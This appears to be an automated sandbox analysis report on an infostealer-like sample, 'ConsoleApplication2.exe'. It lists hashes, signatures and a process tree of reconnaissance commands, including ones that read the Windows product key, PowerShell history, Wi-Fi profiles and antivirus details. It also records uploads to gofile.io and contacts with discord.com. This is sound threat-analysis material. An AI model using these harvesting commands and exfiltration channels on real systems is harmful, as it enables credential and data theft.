Analysis
- max time kernel: 62s
- max time network: 67s
- platform: windows11-21h2_x64
- resource: win11-20240426-en
- resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 08/06/2024, 13:34 UTC

Behavioral task: behavioral1
- Sample: ConsoleApplication2.exe
- Resource: win10v2004-20240508-en

General
- Target: ConsoleApplication2.exe
- Size: 4.4MB
- MD5: a0f170a09dcc8f9161efe47a518d5a01
- SHA1: 3fefa661fb68a1dd43ddff16202650e0b26ecb20
- SHA256: 06ab5377341cf38c3a3c6628b5bf91d545b7dcd153c629d5025582274a371f43
- SHA512: eaefca62badab468db04dd77812318d50fab36fbc2ce7f2c08163dbda08207c2734a0829793fdacf5c2ac4c3de5d96c6f53f6d0555e5e6f6f145cef810257c44
- SSDEEP: 49152:M9v90k5HkzhwSUiUCAOygB+fEjGDYG12089DZujZGUOutEdNkzRvP61crzPBdWzc:M9v90kOnU7OyYjQsuhVPtd
Malware Config
Signatures
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 8 IoCs)
  flow / ioc: 12 discord.com; 20 discord.com; 27 discord.com; 36 discord.com; 43 discord.com; 51 discord.com; 1 discord.com; 4 discord.com
- Looks up external IP address via web service (10 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow / ioc: 37 ipinfo.io; 52 ipinfo.io; 1 ipinfo.io; 2 ipinfo.io; 4 ipinfo.io; 5 ipinfo.io; 21 ipinfo.io; 30 ipinfo.io; 13 ipinfo.io; 44 ipinfo.io
  pid / process: 3180 powershell.exe
- Detects videocard installed (1 TTP, 1 IoC)
  Uses WMIC.exe to determine videocard installed.
  pid / process: 1356 WMIC.exe
- Enumerates processes with tasklist (1 TTP, 1 IoC)
  pid / process: 3568 tasklist.exe
- Gathers system information (1 TTP, 1 IoC)
  Runs systeminfo.exe.
  pid / process: 460 systeminfo.exe
- Runs ping.exe (1 TTP, 1 IoC)
  pid / process: 4900 PING.EXE
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid / process: 3268 powershell.exe; 3268 powershell.exe; 4636 powershell.exe; 4636 powershell.exe; 3180 powershell.exe; 3180 powershell.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes
- [PID 4872] C:\Users\Admin\AppData\Local\Temp\ConsoleApplication2.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\ConsoleApplication2.exe"
  signatures: Suspicious use of WriteProcessMemory
  - [PID 1516] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.1
    signatures: Suspicious use of WriteProcessMemory
    - [PID 4900] C:\Windows\SysWOW64\PING.EXE
      cmdline: ping -n 1 1.1.1.1
      signatures: Runs ping.exe
  - [PID 1364] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
    signatures: Suspicious use of WriteProcessMemory
    - [PID 1832] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic csproduct get uuid
      signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 3852] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c powershell Get-ItemPropertyValue -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
    signatures: Suspicious use of WriteProcessMemory
    - [PID 3268] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - [PID 3824] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get name
    signatures: Suspicious use of WriteProcessMemory
    - [PID 1356] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic path win32_VideoController get name
      signatures: Detects videocard installed; Suspicious use of AdjustPrivilegeToken
  - [PID 4248] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic cpu get name
    signatures: Suspicious use of WriteProcessMemory
    - [PID 4016] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic cpu get name
  - [PID 4992] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    signatures: Suspicious use of WriteProcessMemory
    - [PID 1636] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 1500] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get currentrefreshrate
    signatures: Suspicious use of WriteProcessMemory
    - [PID 2432] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic path win32_VideoController get currentrefreshrate
  - [PID 1912] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c powershell Get-Content (Get-PSReadlineOption).HistorySavePath
    signatures: Suspicious use of WriteProcessMemory
    - [PID 4636] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell Get-Content (Get-PSReadlineOption).HistorySavePath
      signatures: Suspicious behavior: EnumeratesProcesses
  - [PID 2116] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c tasklist
    signatures: Suspicious use of WriteProcessMemory
    - [PID 3568] C:\Windows\SysWOW64\tasklist.exe
      cmdline: tasklist
      signatures: Enumerates processes with tasklist
  - [PID 2716] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c systeminfo
    signatures: Suspicious use of WriteProcessMemory
    - [PID 460] C:\Windows\SysWOW64\systeminfo.exe
      cmdline: systeminfo
      signatures: Gathers system information
  - [PID 2916] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c netsh wlan show profile
    signatures: Suspicious use of WriteProcessMemory
    - [PID 2440] C:\Windows\SysWOW64\netsh.exe
      cmdline: netsh wlan show profile
  - [PID 1160] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value
    - [PID 2848] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value
  - [PID 5020] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c powershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"
    - [PID 3180] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"
      signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
  - [PID 3864] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 1156] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 3576] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
    - [PID 1264] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic csproduct get uuid
  - [PID 4356] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 4996] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 4884] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 1720] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 4948] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
    - [PID 2912] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic csproduct get uuid
  - [PID 3308] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 4740] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 236] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 4304] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 4672] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
    - [PID 4500] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic csproduct get uuid
  - [PID 1628] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 568] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 3712] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 5008] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 3964] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
    - [PID 4112] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic csproduct get uuid
  - [PID 704] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 1500] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 2884] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 4400] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 2836] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
    - [PID 2960] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic csproduct get uuid
  - [PID 2972] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 1804] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 2808] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 2816] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
  - [PID 4156] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
    - [PID 4008] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic csproduct get uuid
  - [PID 3888] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
    - [PID 1892] C:\Windows\SysWOW64\Wbem\WMIC.exe
      cmdline: wmic os get Caption /value
Network
- Remote address: 8.8.8.8:53
  Request: ipinfo.io IN A
  Response: ipinfo.io IN A 34.117.186.192
- Remote address: 8.8.8.8:53
  Request: 8.8.8.8.in-addr.arpa IN PTR
  Response: 8.8.8.8.in-addr.arpa IN PTR dns.google
- Remote address: 8.8.8.8:53
  Request: api.gofile.io IN A
  Response: api.gofile.io IN A 151.80.29.83; api.gofile.io IN A 51.178.66.33; api.gofile.io IN A 51.38.43.18
- Remote address: 8.8.8.8:53
  Request: 83.29.80.151.in-addr.arpa IN PTR
  Response: 83.29.80.151.in-addr.arpa IN PTR ns3048708.ip-151-80-29.eu
- Remote address: 8.8.8.8:53
  Request: discord.com IN A
  Response: discord.com IN A 162.159.138.232; discord.com IN A 162.159.136.232; discord.com IN A 162.159.137.232; discord.com IN A 162.159.128.233; discord.com IN A 162.159.135.232
- Remote address: 8.8.8.8:53
  Request: discord.com IN A
- Remote address: 8.8.8.8:53
  Request: 192.186.117.34.in-addr.arpa IN PTR
  Response: 192.186.117.34.in-addr.arpa IN PTR 192.186.117.34.bc.googleusercontent.com
- Remote address: 8.8.8.8:53
  Request: store9.gofile.io IN A
  Response: store9.gofile.io IN A 206.168.190.239
- Remote address: 8.8.8.8:53
  Request: 239.190.168.206.in-addr.arpa IN PTR
  Response: (empty)
- Remote address: 8.8.8.8:53
  Request: 232.138.159.162.in-addr.arpa IN PTR
  Response: (empty)
- Remote address: 8.8.8.8:53
  Request: store10.gofile.io IN A
  Response: store10.gofile.io IN A 31.14.70.252
- Remote address: 8.8.8.8:53
  Request: 252.70.14.31.in-addr.arpa IN PTR
  Response: 252.70.14.31.in-addr.arpa IN PTR 31-14-70-252.cust.moji.fr
- Remote address: 8.8.8.8:53
  Request: store1.gofile.io IN A
  Response: store1.gofile.io IN A 45.112.123.227
- Remote address: 8.8.8.8:53
  Request: 227.123.112.45.in-addr.arpa IN PTR
  Response: (empty)
- Remote address: 8.8.8.8:53
  Request: store3.gofile.io IN A
  Response: store3.gofile.io IN A 136.175.10.233
- Remote address: 8.8.8.8:53
  Request: 233.10.175.136.in-addr.arpa IN PTR
  Response: (empty)
- Remote address: 8.8.8.8:53
  Request: store4.gofile.io IN A
  Response: store4.gofile.io IN A 31.14.70.245
- Remote address: 8.8.8.8:53
  Request: discord.com IN A
  Response: discord.com IN A 162.159.136.232; discord.com IN A 162.159.128.233; discord.com IN A 162.159.138.232; discord.com IN A 162.159.137.232; discord.com IN A 162.159.135.232
- Remote address: 8.8.8.8:53
  Request: 245.70.14.31.in-addr.arpa IN PTR
  Response: 245.70.14.31.in-addr.arpa IN PTR 31-14-70-245.cust.moji.fr
- Remote address: 8.8.8.8:53
  Request: ipinfo.io IN A
  Response: ipinfo.io IN A 34.117.186.192
- Remote address: 8.8.8.8:53
  Request: 232.136.159.162.in-addr.arpa IN PTR
  Response: (empty)
- Remote address: 31.14.70.252:443
  Request:
  POST /uploadFile HTTP/1.1
  Host: store10.gofile.io
  Accept: */*
  Content-Length: 200525
  Content-Type: multipart/form-data; boundary=------------------------1133fc2b1e53fbd6
  Response:
  HTTP/1.1 200 OK
  Date: Sat, 08 Jun 2024 13:35:14 GMT
  Content-Type: application/json
  Content-Length: 316
  Connection: keep-alive
  Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
  Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
- Remote address: 31.14.70.252:443
  Request:
  POST /uploadFile HTTP/1.1
  Host: store10.gofile.io
  Accept: */*
  Content-Length: 200525
  Content-Type: multipart/form-data; boundary=------------------------797fa654c3e8f7dd
  Response:
  HTTP/1.1 200 OK
  Date: Sat, 08 Jun 2024 13:35:40 GMT
  Content-Type: application/json
  Content-Length: 316
  Connection: keep-alive
  Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
  Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
MITRE ATT&CK Enterprise v15
Downloads